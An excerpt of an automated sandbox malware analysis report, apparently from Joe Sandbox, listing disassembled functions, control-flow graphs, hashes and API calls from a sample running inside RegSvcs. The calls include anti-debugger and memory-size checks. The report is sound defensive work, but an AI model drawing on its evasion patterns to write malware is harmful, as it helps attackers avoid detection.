                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 430 169d719-169d7b4 DuplicateHandle 431 169d7bd-169d7da 430->431 432 169d7b6-169d7bc 430->432 432->431
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0169D7A7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 722628004276fa724d893ee9c1f73325296eefc31ed597aa7644b344be3149ea
                                                • Instruction ID: d0750512fef5ebd41232d0e834adf842cb83fb42d61687948662b3ef77b41f64
                                                • Opcode Fuzzy Hash: 722628004276fa724d893ee9c1f73325296eefc31ed597aa7644b344be3149ea
                                                • Instruction Fuzzy Hash: 5221E4B5D002499FDB10CF9AD984AEEBBF4FB48320F14841AE918A7350D378A944CF60
                                                Function 076C7CB8 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 440 76c7cb8-76c7d40 VirtualProtect 443 76c7d49-76c7d6a 440->443 444 76c7d42-76c7d48 440->444 444->443
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 076C7D33
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1561797053.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_76c0000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: a4e03ce4c535c51bd3810cdf9658aa3016ad2a40e1e4d8ae357a86cd94b3ffe2
                                                • Instruction ID: f0b907def3f57fc7ae628c673fb22dfa2022cb5bf3b0b4f4325cc50a64fd103e
                                                • Opcode Fuzzy Hash: a4e03ce4c535c51bd3810cdf9658aa3016ad2a40e1e4d8ae357a86cd94b3ffe2
                                                • Instruction Fuzzy Hash: C921F4B5D002499FCB10CF9AC484BEEFBF4FB48310F10842AE959A7250D379A545CFA5
                                                Function 076C7CC0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 446 76c7cc0-76c7d40 VirtualProtect 448 76c7d49-76c7d6a 446->448 449 76c7d42-76c7d48 446->449 449->448
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 076C7D33
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1561797053.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_76c0000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: e973e006af94f7eea8754f88fd19d568daaf046daf194d0a523dc18750c81c79
                                                • Instruction ID: be4cf4ddb29224477cd97ce453dac01de0acb18478c6c7c987c5e9dcf2315814
                                                • Opcode Fuzzy Hash: e973e006af94f7eea8754f88fd19d568daaf046daf194d0a523dc18750c81c79
                                                • Instruction Fuzzy Hash: 9321D3B59002499FDB10CFAAC484BEEFBF4FB48320F108429E959A7250D378A945CFA5
                                                Function 0169B038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 451 169b038-169b078 452 169b07a-169b07d 451->452 453 169b080-169b0ab GetModuleHandleW 451->453 452->453 454 169b0ad-169b0b3 453->454 455 169b0b4-169b0c8 453->455 454->455
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0169B09E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 60d6d08f4b29452bd484468557642a7c378806b64b1faf23c388fa99d9e4109e
                                                • Instruction ID: dfd907f439d772d35adb11d8fef0057374abebd1f2cbde90fa6257ba97050dc7
                                                • Opcode Fuzzy Hash: 60d6d08f4b29452bd484468557642a7c378806b64b1faf23c388fa99d9e4109e
                                                • Instruction Fuzzy Hash: FB11E3B5C002498FDB20CF9AD844BDEFBF8EB88714F10851AD969A7210D379A545CFA1

                                                Execution Graph

                                                Execution Coverage:10.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:144
                                                Total number of Limit Nodes:15
                                                execution_graph 41832 6b2e290 41833 6b2e2f8 CreateWindowExW 41832->41833 41835 6b2e3b4 41833->41835 41835->41835 41858 6b23ae0 DuplicateHandle 41859 6b23b76 41858->41859 41860 1270a35 41861 12709f5 41860->41861 41863 127084e 41860->41863 41862 127091b 41863->41862 41867 1271380 41863->41867 41871 6b22780 41863->41871 41875 6b22790 41863->41875 41868 127134d 41867->41868 41869 1271383 41867->41869 41868->41863 41869->41868 41879 1278c88 41869->41879 41872 6b2279f 41871->41872 41892 6b21f7c 41872->41892 41876 6b2279f 41875->41876 41877 6b21f7c GetModuleHandleW 41876->41877 41878 6b227c0 41877->41878 41878->41863 41880 1278c92 41879->41880 41881 1278cac 41880->41881 41884 6b4f638 41880->41884 41888 6b4f628 41880->41888 41881->41869 41886 6b4f64d 41884->41886 41885 6b4f862 41885->41881 41886->41885 41887 6b4fc80 GlobalMemoryStatusEx GlobalMemoryStatusEx 41886->41887 41887->41886 41890 6b4f64d 41888->41890 41889 6b4f862 41889->41881 41890->41889 41891 6b4fc80 GlobalMemoryStatusEx GlobalMemoryStatusEx 41890->41891 41891->41890 41893 6b21f87 41892->41893 41896 6b236dc 41893->41896 41895 6b24146 41895->41895 41897 6b236e7 41896->41897 41898 6b2486c 41897->41898 41900 6b264e8 41897->41900 41898->41895 41901 6b26509 41900->41901 41902 6b2652d 41901->41902 41904 6b26698 41901->41904 41902->41898 41906 6b266a5 41904->41906 41905 6b266de 41905->41902 41906->41905 41908 6b25404 41906->41908 41909 6b2540f 41908->41909 41911 6b26750 41909->41911 41912 6b25438 41909->41912 41913 6b25443 41912->41913 41919 6b25448 41913->41919 41915 6b267bf 41923 6b2b9c8 41915->41923 41928 6b2b9e0 41915->41928 41916 6b267f9 41916->41911 41922 6b25453 41919->41922 41920 6b27960 41920->41915 41921 6b264e8 GetModuleHandleW 41921->41920 41922->41920 41922->41921 41925 6b2b9e0 41923->41925 41924 6b2ba1d 41924->41916 41925->41924 41934 6b2bc58 41925->41934 41937 6b2bc48 41925->41937 41930 6b2ba11 41928->41930 41931 6b2ba5d 41928->41931 41929 6b2ba1d 41929->41916 41930->41929 41932 6b2bc58 GetModuleHandleW 41930->41932 41933 6b2bc48 GetModuleHandleW 41930->41933 41931->41916 41932->41931 41933->41931 41941 6b2bc98 41934->41941 41935 6b2bc62 41935->41924 41938 6b2bc58 41937->41938 41940 6b2bc98 GetModuleHandleW 41938->41940 41939 6b2bc62 41939->41924 41940->41939 41943 6b2bc9d 41941->41943 41942 6b2bcdc 41942->41935 41943->41942 41944 6b2bee0 GetModuleHandleW 41943->41944 41945 6b2bf0d 41944->41945 41945->41935 41946 122d030 41947 122d048 41946->41947 41948 122d0a2 41947->41948 41953 6b2e448 41947->41953 41957 6b2f198 41947->41957 41963 6b2d6c4 41947->41963 41969 6b2e437 41947->41969 41954 6b2e46e 41953->41954 41955 6b2d6c4 2 API calls 41954->41955 41956 6b2e48f 41955->41956 41956->41948 41958 6b2f1d5 41957->41958 41959 6b2f207 41958->41959 41973 6b2f330 41958->41973 41978 6b2f3fc 41958->41978 41984 6b2f320 41958->41984 41964 6b2d6cf 41963->41964 41965 6b2f207 41964->41965 41966 6b2f330 2 API calls 41964->41966 41967 6b2f320 2 API calls 41964->41967 41968 6b2f3fc 2 API calls 41964->41968 41966->41965 41967->41965 41968->41965 41970 6b2e448 41969->41970 41971 6b2d6c4 2 API calls 41970->41971 41972 6b2e48f 41971->41972 41972->41948 41974 6b2f344 41973->41974 41989 6b2f3e8 41974->41989 41992 6b2f3d8 41974->41992 41975 6b2f3d0 41975->41959 41979 6b2f3ba 41978->41979 41980 6b2f40a 41978->41980 41982 6b2f3e8 2 API calls 41979->41982 41983 6b2f3d8 2 API calls 41979->41983 41981 6b2f3d0 41981->41959 41982->41981 41983->41981 41986 6b2f330 41984->41986 41985 6b2f3d0 41985->41959 41987 6b2f3e8 2 API calls 41986->41987 41988 6b2f3d8 2 API calls 41986->41988 41987->41985 41988->41985 41990 6b2f3f9 41989->41990 41996 6f70c40 41989->41996 41990->41975 41993 6b2f3e8 41992->41993 41994 6b2f3f9 41993->41994 41995 6f70c40 2 API calls 41993->41995 41994->41975 41995->41994 42000 6f70c62 41996->42000 42004 6f70c70 41996->42004 41997 6f70c5a 41997->41990 42001 6f70c70 42000->42001 42002 6f70d0a CallWindowProcW 42001->42002 42003 6f70cb9 42001->42003 42002->42003 42003->41997 42005 6f70cb2 42004->42005 42007 6f70cb9 42004->42007 42006 6f70d0a CallWindowProcW 42005->42006 42005->42007 42006->42007 42007->41997 42008 1277ed0 42009 1277f14 CheckRemoteDebuggerPresent 42008->42009 42010 1277f56 42009->42010 41836 6b23898 41837 6b238de GetCurrentProcess 41836->41837 41839 6b23930 GetCurrentThread 41837->41839 41840 6b23929 41837->41840 41841 6b23966 41839->41841 41842 6b2396d GetCurrentProcess 41839->41842 41840->41839 41841->41842 41845 6b239a3 41842->41845 41843 6b239cb GetCurrentThreadId 41844 6b239fc 41843->41844 41845->41843 41846 6f72e38 41847 6f72e60 41846->41847 41850 6f72e8c 41846->41850 41848 6f72e69 41847->41848 41851 6f722c4 41847->41851 41852 6f722cf 41851->41852 41853 6f73183 41852->41853 41855 6f722e0 41852->41855 41853->41850 41856 6f731b8 OleInitialize 41855->41856 41857 6f7321c 41856->41857 41857->41853

                                                Executed Functions

                                                Function 06B458E7 Relevance: 2.9, Strings: 2, Instructions: 413COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 93 6b458e7-6b45904 94 6b45906-6b45909 93->94 95 6b45918-6b4591b 94->95 96 6b4590b-6b45911 94->96 99 6b4591d-6b45922 95->99 100 6b45938-6b4593b 95->100 97 6b45942-6b45961 96->97 98 6b45913 96->98 112 6b45966-6b45969 97->112 113 6b45963 97->113 98->95 102 6b45924 99->102 103 6b45927-6b45933 99->103 100->96 101 6b4593d-6b45940 100->101 101->97 104 6b45974-6b45977 101->104 102->103 103->100 106 6b45980-6b45983 104->106 107 6b45979-6b4597b 104->107 110 6b45985-6b45987 106->110 111 6b4598a-6b4598c 106->111 107->106 110->111 114 6b45993-6b45996 111->114 115 6b4598e 111->115 117 6b459a3-6b459e2 112->117 118 6b4596b-6b4596f 112->118 113->112 114->94 116 6b4599c-6b459a2 114->116 115->114 120 6b459e4-6b459e7 117->120 118->104 121 6b459f7-6b459fa 120->121 122 6b459e9-6b459f0 120->122 125 6b45a16-6b45a19 121->125 126 6b459fc-6b45a11 121->126 123 6b459f2 122->123 124 6b45a1f-6b45a26 122->124 123->121 127 6b45b74-6b45b87 124->127 128 6b45a2c-6b45a73 124->128 125->124 129 6b45b93-6b45b96 125->129 126->125 146 6b45a75-6b45a84 128->146 131 6b45b98-6b45ba6 129->131 132 6b45bab-6b45bae 129->132 131->132 133 6b45bb0-6b45bb9 132->133 134 6b45bbc-6b45bbe 132->134 137 6b45bc5-6b45bc8 134->137 138 6b45bc0 134->138 137->120 142 6b45bce-6b45bd8 137->142 138->137 148 6b45a8a-6b45aa0 146->148 149 6b45bdb-6b45c1a 146->149 148->149 152 6b45aa6-6b45aae 148->152 153 6b45c1c-6b45c1f 149->153 152->146 154 6b45ab0-6b45ab6 152->154 155 6b45c37-6b45c3a 153->155 156 6b45c21-6b45c34 153->156 157 6b45b16-6b45b66 call 6b44728 154->157 158 6b45ab8-6b45abb 154->158 159 6b45c3c-6b45c49 155->159 160 6b45c4e-6b45c51 155->160 206 6b45b71 157->206 207 6b45b68 157->207 158->149 163 6b45ac1-6b45acc 158->163 159->160 161 6b45c67-6b45c6a 160->161 162 6b45c53-6b45c62 160->162 167 6b45c84-6b45c87 161->167 168 6b45c6c-6b45c7f 161->168 162->161 163->149 166 6b45ad2-6b45adc 163->166 166->149 171 6b45ae2-6b45aec 166->171 172 6b45cc8-6b45ccb 167->172 173 6b45c89-6b45ca8 167->173 168->167 171->149 176 6b45af2-6b45b07 171->176 174 6b45ce3-6b45ce6 172->174 175 6b45ccd-6b45cde 172->175 193 6b45dc8-6b45dd2 173->193 179 6b45cf6-6b45cf9 174->179 180 6b45ce8-6b45cef 174->180 175->174 176->149 181 6b45b0d-6b45b14 176->181 185 6b45cff-6b45d06 179->185 186 6b45d8a-6b45d8d 179->186 184 6b45cf1 180->184 180->185 181->157 181->158 184->179 185->156 190 6b45d0c-6b45d77 185->190 191 6b45da0-6b45da3 186->191 192 6b45d8f-6b45d9b 186->192 214 6b45d80-6b45d87 190->214 195 6b45da5-6b45db1 191->195 196 6b45db6-6b45db8 191->196 192->191 195->196 199 6b45dbf-6b45dc2 196->199 200 6b45dba 196->200 199->153 199->193 200->199 206->127 207->206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XPq$\Oq
                                                • API String ID: 0-3725437444
                                                • Opcode ID: ae183fb586117121c03ba09459a8c68f10413348002f34bd174585d14d212e53
                                                • Instruction ID: 87ff20747e5de7473dc77792532ee1a9c7e85dc295f98bcaa8461d98d38b3d7e
                                                • Opcode Fuzzy Hash: ae183fb586117121c03ba09459a8c68f10413348002f34bd174585d14d212e53
                                                • Instruction Fuzzy Hash: 15D12A72B105148FDF64EB68D484AADBBF2FF89320F2484AAD44ADB351CA35DC45CB91
                                                Function 06B4237A Relevance: 1.0, Instructions: 1028COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ae5adcc32df85dfe414d68052c47abbfa66fea0bd136370e248e8f6699b89b2
                                                • Instruction ID: 653a22c263c8c58ea5478b6d9f3b96c1173ec94333de976c642a04e1f1051de6
                                                • Opcode Fuzzy Hash: 1ae5adcc32df85dfe414d68052c47abbfa66fea0bd136370e248e8f6699b89b2
                                                • Instruction Fuzzy Hash: A2924874A002048FDB64EB68C584BADBBF2FF45314F5485A9E4099B362DB35ED85EF80
                                                Function 06B461F0 Relevance: .8, Instructions: 831COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dae762c2c5d1900b1baaba1e6f09084df7840c8c9dcbab6a0e223dd6962cb870
                                                • Instruction ID: f425bf9a7e31081ba2750c0fc06417279afe559d6d432d80f47879f5ee5d594a
                                                • Opcode Fuzzy Hash: dae762c2c5d1900b1baaba1e6f09084df7840c8c9dcbab6a0e223dd6962cb870
                                                • Instruction Fuzzy Hash: 83629C70A002089FDB64EB68D594BADB7F2FF89310F1484A9E406DB395EB35ED45DB80
                                                Function 06B4C188 Relevance: .6, Instructions: 644COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e855911b24ae4ab52af09992abcc849b71290fea2ea2cac719afdc8ba4cd0525
                                                • Instruction ID: f73ba67e1d0402963e28d7de5114d071d148d1b5ccbde39c49ef01d137c153ca
                                                • Opcode Fuzzy Hash: e855911b24ae4ab52af09992abcc849b71290fea2ea2cac719afdc8ba4cd0525
                                                • Instruction Fuzzy Hash: 0232CE74B112089FDB54EF68D890BAEBBB2FB88710F108569D406EB355DB35EC42CB90
                                                Function 06B451E8 Relevance: .6, Instructions: 594COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21764afe23d37c47212a8143c2d3b9ed2f1f4e1534d5e271bbeb7c3ec4b3f5cb
                                                • Instruction ID: 4c6f1e968183dcf5e94de0e84588f422981dca4700cfc6fb4d786ce674d3aea6
                                                • Opcode Fuzzy Hash: 21764afe23d37c47212a8143c2d3b9ed2f1f4e1534d5e271bbeb7c3ec4b3f5cb
                                                • Instruction Fuzzy Hash: DC12B3B2E006189FDF70EB64D8807AEBBB2FF85310F2484A9D5569B345DA34DC46DB90
                                                Function 06B4B3F6 Relevance: .6, Instructions: 562COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c7b8e2c1407f1a0af48f7e40fde57c82fe69c7a78bddbcdf3bc7223a8458647
                                                • Instruction ID: 5a5513a6b8615711164600b3be9536935f0e1f3a59f426232bbb028461144bd1
                                                • Opcode Fuzzy Hash: 4c7b8e2c1407f1a0af48f7e40fde57c82fe69c7a78bddbcdf3bc7223a8458647
                                                • Instruction Fuzzy Hash: C522A2B0E102098FEF64EF68C4907ADB7B2FB49310F2099A6E545EB395DA34DC81DB51
                                                Function 06B430A8 Relevance: .5, Instructions: 545COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db53f5cc457c7f06d345269beeb422b13c1f74985d9fcaf73d4c7e05a16bdccd
                                                • Instruction ID: f1adbb7a2000ee9bcc88f82bdb1149ea2f6fe513b5fbd4d90201cb274310bfb6
                                                • Opcode Fuzzy Hash: db53f5cc457c7f06d345269beeb422b13c1f74985d9fcaf73d4c7e05a16bdccd
                                                • Instruction Fuzzy Hash: 6B321E31E1061ACFDB14EF79C85469DB7B2FFC9300F1496AAD44AA7254EB70A985CF80
                                                Function 06B47980 Relevance: .5, Instructions: 478COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0cc9eb5b59c49d042c1728f163bb430710a8b0c028c9ffb4ca43c679e97671d
                                                • Instruction ID: e96c869db4dc19befc107c989902498e85a141140c14a596c8c0ec92c8fb2833
                                                • Opcode Fuzzy Hash: b0cc9eb5b59c49d042c1728f163bb430710a8b0c028c9ffb4ca43c679e97671d
                                                • Instruction Fuzzy Hash: 65028B70B102199FDB54EB68D494BAEB7F6FF84310F248569D4069B396DB35EC42CB80
                                                Function 06B2388A Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06B23916
                                                • GetCurrentThread.KERNEL32 ref: 06B23953
                                                • GetCurrentProcess.KERNEL32 ref: 06B23990
                                                • GetCurrentThreadId.KERNEL32 ref: 06B239E9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: e75fa386a01a33ce7979924e0e2795b3556e8eb28f1147a7810a23b74196f7ae
                                                • Instruction ID: 2f2eda72d6dc4bb97a64db34670c7c9656746f292504aeffe3e94190b962fe7f
                                                • Opcode Fuzzy Hash: e75fa386a01a33ce7979924e0e2795b3556e8eb28f1147a7810a23b74196f7ae
                                                • Instruction Fuzzy Hash: F85167B0E013498FDB54CFA9D848BDEBBF1EF89310F208059E059A7360DB799945CB66
                                                Function 06B23898 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06B23916
                                                • GetCurrentThread.KERNEL32 ref: 06B23953
                                                • GetCurrentProcess.KERNEL32 ref: 06B23990
                                                • GetCurrentThreadId.KERNEL32 ref: 06B239E9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 314bb429f8a7277fa5055ed07e7ebc2032d3ab751623323901cccc2b919fef4e
                                                • Instruction ID: e51723106bd40249aa61765719ba739fc40a2230bc1d51151de67af971a569e9
                                                • Opcode Fuzzy Hash: 314bb429f8a7277fa5055ed07e7ebc2032d3ab751623323901cccc2b919fef4e
                                                • Instruction Fuzzy Hash: DC5168B09003498FDB54CFA9D448BDEBBF1EF89310F208059E059A7360D7789945CF65
                                                Function 06B447B0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 47 6b447b0-6b447d4 48 6b447d6-6b447d9 47->48 49 6b447fa-6b447fd 48->49 50 6b447db-6b447f5 48->50 51 6b44803-6b448fb 49->51 52 6b44edc-6b44ede 49->52 50->49 70 6b44901-6b4494e call 6b4505a 51->70 71 6b4497e-6b44985 51->71 53 6b44ee5-6b44ee8 52->53 54 6b44ee0 52->54 53->48 56 6b44eee-6b44efb 53->56 54->53 84 6b44954-6b44970 70->84 72 6b44a09-6b44a12 71->72 73 6b4498b-6b449fb 71->73 72->56 90 6b44a06 73->90 91 6b449fd 73->91 87 6b44972 84->87 88 6b4497b 84->88 87->88 88->71 90->72 91->90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fq$XPq$\Oq
                                                • API String ID: 0-132346853
                                                • Opcode ID: 722b7ad44a180909572f91036804728d27904d6b73b4f02d2d824bba5d592992
                                                • Instruction ID: 7ab7a2287f0ac8ded838bf205e0c6b9e069e57e2bbf22f8a5336ee5ccc9cdd6d
                                                • Opcode Fuzzy Hash: 722b7ad44a180909572f91036804728d27904d6b73b4f02d2d824bba5d592992
                                                • Instruction Fuzzy Hash: F2619E70E102199FEF54EFA9C8547AEBBF6FF88310F208469D106AB395DB758C458B90
                                                Function 06B447A1 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 676 6b447a1-6b447d4 678 6b447d6-6b447d9 676->678 679 6b447fa-6b447fd 678->679 680 6b447db-6b447f5 678->680 681 6b44803-6b448fb 679->681 682 6b44edc-6b44ede 679->682 680->679 700 6b44901-6b4494e call 6b4505a 681->700 701 6b4497e-6b44985 681->701 683 6b44ee5-6b44ee8 682->683 684 6b44ee0 682->684 683->678 686 6b44eee-6b44efb 683->686 684->683 714 6b44954-6b44970 700->714 702 6b44a09-6b44a12 701->702 703 6b4498b-6b449fb 701->703 702->686 720 6b44a06 703->720 721 6b449fd 703->721 717 6b44972 714->717 718 6b4497b 714->718 717->718 718->701 720->702 721->720
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fq$XPq
                                                • API String ID: 0-3167736908
                                                • Opcode ID: 1a34a93a46c981d98567811640ddc8633aa1583ddea822ea201596764abf7524
                                                • Instruction ID: fbcc1142109c7d7fe2f65c796992a347a2ea965af0688447ffe7685b963f8787
                                                • Opcode Fuzzy Hash: 1a34a93a46c981d98567811640ddc8633aa1583ddea822ea201596764abf7524
                                                • Instruction Fuzzy Hash: A7516F70E102189FDB55EFA9C854BAEBBF7FF88310F208529D106AB395DB758C058B90
                                                Function 06B2BC98 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 888 6b2bc98-6b2bcb7 890 6b2bce3-6b2bce7 888->890 891 6b2bcb9-6b2bcc6 call 6b2abfc 888->891 893 6b2bcfb-6b2bd3c 890->893 894 6b2bce9-6b2bcf3 890->894 897 6b2bcc8 891->897 898 6b2bcdc 891->898 900 6b2bd49-6b2bd57 893->900 901 6b2bd3e-6b2bd46 893->901 894->893 945 6b2bcce call 6b2bf32 897->945 946 6b2bcce call 6b2bf40 897->946 898->890 902 6b2bd7b-6b2bd7d 900->902 903 6b2bd59-6b2bd5e 900->903 901->900 908 6b2bd80-6b2bd87 902->908 905 6b2bd60-6b2bd67 call 6b2ac08 903->905 906 6b2bd69 903->906 904 6b2bcd4-6b2bcd6 904->898 907 6b2be18-6b2bed8 904->907 910 6b2bd6b-6b2bd79 905->910 906->910 940 6b2bee0-6b2bf0b GetModuleHandleW 907->940 941 6b2beda-6b2bedd 907->941 911 6b2bd94-6b2bd9b 908->911 912 6b2bd89-6b2bd91 908->912 910->908 913 6b2bda8-6b2bdb1 call 6b2444c 911->913 914 6b2bd9d-6b2bda5 911->914 912->911 920 6b2bdb3-6b2bdbb 913->920 921 6b2bdbe-6b2bdc3 913->921 914->913 920->921 922 6b2bde1-6b2bdee 921->922 923 6b2bdc5-6b2bdcc 921->923 930 6b2bdf0-6b2be0e 922->930 931 6b2be11-6b2be17 922->931 923->922 925 6b2bdce-6b2bdde call 6b2aa78 call 6b2ac18 923->925 925->922 930->931 942 6b2bf14-6b2bf28 940->942 943 6b2bf0d-6b2bf13 940->943 941->940 943->942 945->904 946->904
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06B2BEFE
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b7bb67e623b0d94d1729de06835ddeadec6164546eb3aded621a383dde634caf
                                                • Instruction ID: 9a49e2d793cd5060e77aa75a1f0838f1305037607e1f8a527399fade3e3a1a2a
                                                • Opcode Fuzzy Hash: b7bb67e623b0d94d1729de06835ddeadec6164546eb3aded621a383dde634caf
                                                • Instruction Fuzzy Hash: EA8167B0A00B168FD7A4DF29D44079ABBF1FF88204F008A6DD49AD7A50DB75E846CF91
                                                Function 06B2E284 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
